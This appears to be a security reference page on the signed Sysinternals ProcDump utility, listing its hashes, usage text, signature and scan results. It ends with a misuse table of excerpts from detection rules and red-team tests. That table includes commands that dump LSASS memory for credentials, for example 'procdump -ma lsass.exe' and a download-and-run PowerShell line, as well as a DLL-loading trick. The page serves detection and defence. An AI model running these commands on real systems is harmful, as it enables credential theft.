procdump.exe

  • File Path: C:\SysinternalsSuite\procdump.exe
  • Description: Sysinternals process dump utility

Hashes

Type Hash
MD5 D3763FFBFAF30BCFD866B8ED0324E7A3
SHA1 E9967DDB2860174F4FAC3C82A7DCDDFE106AFB25
SHA256 916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802
SHA384 6706A10B08E809AEA04D8D3ECFF467B9619ABE1071AAA34ED9DC36C9DF900DECB21A06CD191E50AEFBF42B98033BD026
SHA512 4F14DEE268B0982D620B909C243F61870E56BAB161458BF50F7102207F563D244D100B9CFFA89B271A9CFDFFD2BD1856BDBFCD65DF2EA1EC41AD8638C08C1F55
SSDEEP 12288:RhkYuFNNIYgv1npe39hqdbaoys3Fm7eNMd1MY:RdNEiUoL3Fv81l
IMP 83B075100F8ECC5BF8446EDDD8E9CD6E
PESHA1 7C8C117470D5D611FAF521136703FB1258B315CB
PE256 9E537DE30214983492DB3FC38E5AE52FE32D93CF6DF5C7D6927083983AE08699

Runtime Data

Usage (stdout):


ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

Monitors a process and writes a dump file when the process exceeds the
specified criteria or has an exception.

Capture Usage: 
   procdump.exe [-mm] [-ma] [-mp] [-mc Mask] [-md Callback_DLL] [-mk]
                [-n Count]
                [-s Seconds]
                [-c|-cl CPU_Usage [-u]]
                [-m|-ml Commit_Usage]
                [-p|-pl Counter_Threshold]
                [-h]
                [-e [1 [-g] [-b]]]
                [-l]
                [-t]
                [-f  Include_Filter, ...]
                [-fx Exclude_Filter, ...]
                [-o]
                [-r [1..5] [-a]]
                [-at Timeout]
                [-wer]
                [-64]
                {
                 { {[-w] Process_Name | Service_Name | PID} [Dump_File | Dump_Folder]}
                |
                 {-x Dump_Folder Image_File [Argument, ...]}
                }
Install Usage: 
   procdump.exe -i [Dump_Folder]
                [-mm] [-ma] [-mp] [-mc Mask] [-md Callback_DLL] [-mk]
                [-r]
                [-at Timeout]
                [-k]
                [-wer]
Uninstall Usage: 
   procdump.exe -u

Options:
   -mm     Write a 'Mini' dump file. (default)
           Includes the Process, Thread, Module, Handle and Address Space info.
   -ma     Write a 'Full' dump file.
           Includes All the Image, Mapped and Private memory.
   -mp     Write a 'MiniPlus' dump file.
           Includes all Private memory and all Read/Write Image or Mapped memory.
           To minimize size, the largest Private memory area over 512MB is excluded.
           A memory area is defined as the sum of same-sized memory allocations.
           The dump is as detailed as a Full dump but 10%-75% the size.
           Note: CLR processes are dumped as Full (-ma) due to debugging limitations.
   -mc     Write a 'Custom' dump file.
           Include memory defined by the specified MINIDUMP_TYPE mask (Hex).
   -md     Write a 'Callback' dump file.
           Include memory defined by the MiniDumpWriteDump callback routine
           named MiniDumpCallbackRoutine of the specified DLL.
   -mk     Also write a 'Kernel' dump file.
           Includes the kernel stacks of the threads in the process.
           OS doesn't support a kernel dump (-mk) when using a clone (-r).
           When using multiple dump sizes, a kernel dump is taken for each dump size.

   -a      Avoid outage. Requires -r. If the trigger will cause the target
           to suspend for a prolonged time due to an exceeded concurrent
           dump limit, the trigger will be skipped.
   -at     Avoid outage at Timeout. Cancel the trigger's collection at N seconds.
   -b      Treat debug breakpoints as exceptions (otherwise ignore them).
   -c      CPU threshold above which to create a dump of the process.
   -cl     CPU threshold below which to create a dump of the process.
   -e      Write a dump when the process encounters an unhandled exception.
           Include the 1 to create dump on first chance exceptions.
   -f      Filter (include) on the content of exceptions and debug logging.
           Wildcards (*) are supported.
   -fx     Filter (exclude) on the content of exceptions and debug logging.
           Wildcards (*) are supported.
   -g      Run as a native debugger in a managed process (no interop).
   -h      Write dump if process has a hung window (does not respond to
           window messages for at least 5 seconds).
   -i      Install ProcDump as the AeDebug postmortem debugger.
           Only -mm, -ma, -mp, -mc, -md and -r are supported as additional options.
           Uninstall (-u only) restores the previous configuration.
   -k      Kill the process after cloning (-r), or at end of dump collection.
   -l      Display the debug logging of the process.
   -m      Memory commit threshold in MB at which to create a dump.
   -ml     Trigger when memory commit drops below specified MB value.
   -n      Number of dumps to write before exiting.
   -o      Overwrite an existing dump file.
   -p      Trigger on the specified performance counter when the threshold
           is exceeded. Note: to specify a process counter when there are
           multiple instances of the process running, use the process ID
           with the following syntax: "\Process(<name>_<pid>)\counter"
   -pl     Trigger when performance counter falls below the specified value.
   -r      Dump using a clone. Concurrent limit is optional (default 1, max 5).
           OS doesn't support a kernel dump (-mk) when using a clone (-r).
           CAUTION: a high concurrency value may impact system performance.
           - Windows 7   : Uses Reflection. OS doesn't support -e.
           - Windows 8.0 : Uses Reflection. OS doesn't support -e.
           - Windows 8.1+: Uses PSS. All trigger types are supported.
   -s      Consecutive seconds before dump is written (default is 10).
   -t      Write a dump when the process terminates.
   -u      Treat CPU usage relative to a single core (used with -c).
           As the only option, Uninstalls ProcDump as the postmortem debugger.
   -w      Wait for the specified process to launch if it's not running.
   -wer    Queue the (largest) dump to Windows Error Reporting.
   -x      Launch the specified image with optional arguments. 
           If it is a Store Application or Package, ProcDump will start
           on the next activation (only).
   -64     By default ProcDump will capture a 32-bit dump of a 32-bit process
           when running on 64-bit Windows. This option overrides to create a
           64-bit dump. Only use for WOW64 subsystem debugging.

License Agreement:
   Use the -accepteula command line option to automatically accept the
   Sysinternals license agreement.

Automated Termination:
   -cancel <Target Process PID>
           Using this option or setting an event with the name "ProcDump-<PID>"
           is the same as typing Ctrl+C to gracefully terminate ProcDump.
           Graceful termination ensures the process is resumed if a capture is active.
           The cancellation applies to ALL ProcDump instances monitoring the process.

Filename:
   Default dump filename: PROCESSNAME_YYMMDD_HHMMSS.dmp
   The following substitutions are supported:
           PROCESSNAME   Process Name
           PID           Process ID
           EXCEPTIONCODE Exception Code
           YYMMDD        Year/Month/Day
           HHMMSS        Hour/Minute/Second

Examples:
   Use -? -e to see example command lines.


Loaded Modules:

Path
C:\SysinternalsSuite\procdump.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000187721772155940C709000000000187
  • Thumbprint: 2485A7AFA98E178CB8F30C9838346B514AEA4769
  • Issuer: CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: procdump
  • Product Name: ProcDump
  • Company Name: Sysinternals - www.sysinternals.com
  • File Version: 10.0
  • Product Version: 10.0
  • Language: English (United States)
  • Legal Copyright: Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/67
  • VirusTotal Link: https://www.virustotal.com/gui/file/916cc8d6bf2282ae0d2db587f4f96780af59e685a1f1a511e0b2b276669dc802/detection/

File Similarity (ssdeep match)

File Score
C:\SysinternalsSuite\procdump64.exe 57

Possible Misuse

The following table contains possible examples of procdump.exe being misused. While procdump.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - ' -ma ' # ProcDump DRL 1.0
sigma godmode_sigma_rule.yml - ' comsvcs.dll,MiniDump' # Process dumping method apart from procdump DRL 1.0
sigma godmode_sigma_rule.yml - ' comsvcs.dll,#24' # Process dumping method apart from procdump DRL 1.0
sigma godmode_sigma_rule.yml - ' comsvcs.dll MiniDump' # Process dumping method apart from procdump DRL 1.0
sigma godmode_sigma_rule.yml - ' comsvcs.dll #24' # Process dumping method apart from procdump DRL 1.0
sigma godmode_sigma_rule.yml - '.dmp full' # Process dumping method apart from procdump DRL 1.0
sigma file_event_win_lsass_dump.yml - https://www.google.com/search?q=procdump+lsass DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass_2' # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified DRL 1.0
sigma proc_access_win_lsass_memdump.yml description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. DRL 1.0
sigma proc_access_win_lsass_memdump.yml - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html DRL 1.0
sigma proc_creation_win_false_sysinternalsuite.yml - '\procdump.exe' DRL 1.0
sigma proc_creation_win_lsass_dump.yml description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. DRL 1.0
sigma proc_creation_win_lsass_dump.yml Image\|contains: '\procdump' DRL 1.0
sigma proc_creation_win_procdump.yml title: Procdump Usage DRL 1.0
sigma proc_creation_win_procdump.yml description: Detects uses of the SysInternals Procdump utility DRL 1.0
sigma proc_creation_win_procdump.yml - '\procdump.exe' DRL 1.0
sigma proc_creation_win_procdump.yml - Legitimate use of procdump by a developer or administrator DRL 1.0
sigma proc_creation_win_procdump_evasion.yml title: Procdump Evasion DRL 1.0
sigma proc_creation_win_procdump_evasion.yml description: Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'copy procdump' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'move procdump' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'copy lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'move lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - Cases in which procdump just gets copied to a different directory without any renaming DRL 1.0
sigma proc_creation_win_renamed_procdump.yml title: Renamed ProcDump DRL 1.0
sigma proc_creation_win_renamed_procdump.yml description: Detects the execution of a renamed ProcDump executable often used by attackers or malware DRL 1.0
sigma proc_creation_win_renamed_procdump.yml - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump DRL 1.0
sigma proc_creation_win_renamed_procdump.yml OriginalFileName: 'procdump' DRL 1.0
sigma proc_creation_win_renamed_procdump.yml - '\procdump.exe' DRL 1.0
sigma proc_creation_win_renamed_procdump.yml - Procdump illegaly bundled with legitimate software DRL 1.0
sigma proc_creation_win_susp_procdump.yml title: Suspicious Use of Procdump DRL 1.0
sigma proc_creation_win_susp_procdump.yml description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma ' and ' -accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable. DRL 1.0
sigma proc_creation_win_susp_procdump.yml - Another tool that uses the command line switches of Procdump DRL 1.0
sigma proc_creation_win_susp_procdump.yml - Legitimate use of procdump by a developer or administrator DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml title: Suspicious Use of Procdump on LSASS DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml - Another tool that uses the command line switches of Procdump DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - ' -ma ' # ProcDump DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - 'MiniDump' # Process dumping method apart from procdump DRL 1.0
LOLBAS Procdump.yml Name: Procdump(64).exe  
LOLBAS Procdump.yml - Command: procdump.exe -md calc.dll explorer.exe  
LOLBAS Procdump.yml - Command: procdump.exe -md calc.dll foobar  
LOLBAS Procdump.yml - IOC: Anomalous child processes of procdump  
LOLBAS Procdump.yml - IOC: Unsigned DLL load via procdump.exe or procdump64.exe  
atomic-red-team index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md For example, on the target host use procdump: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md * procdump -ma lsass.exe lsass_dump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ProcDump. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md If you see a message saying “procdump.exe is not recognized as an internal or external command”, try using the get-prereq_commands to download and install the ProcDump tool first. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Invoke-WebRequest “https://download.sysinternals.com/files/Procdump.zip” -OutFile “$env:TEMP\Procdump.zip” MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe MIT License. © 2018 Red Canary
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml name: Leverage Procdump for lsass memory Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml $ps_url = "https://download.sysinternals.com/files/Procdump.zip"; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; Apache-2.0
stockpile 7a6ba833-de40-466a-8969-5c37b13603e0.yml "procdump", Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.